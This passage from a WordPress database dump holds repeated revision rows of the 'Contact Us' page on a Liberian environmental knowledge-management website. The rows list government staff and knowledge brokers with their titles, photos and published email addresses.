/>Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager-CCCD Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:33:28','2021-01-22 11:33:28','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3420,42,'2021-01-22 11:41:29','2021-01-22 11:41:29','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager-CCCD Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:41:29','2021-01-22 11:41:29','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3421,42,'2021-01-22 11:41:29','2021-01-22 11:41:29','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager-CCCD Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:41:29','2021-01-22 11:41:29','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3422,42,'2021-01-22 11:41:29','2021-01-22 11:41:29','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" 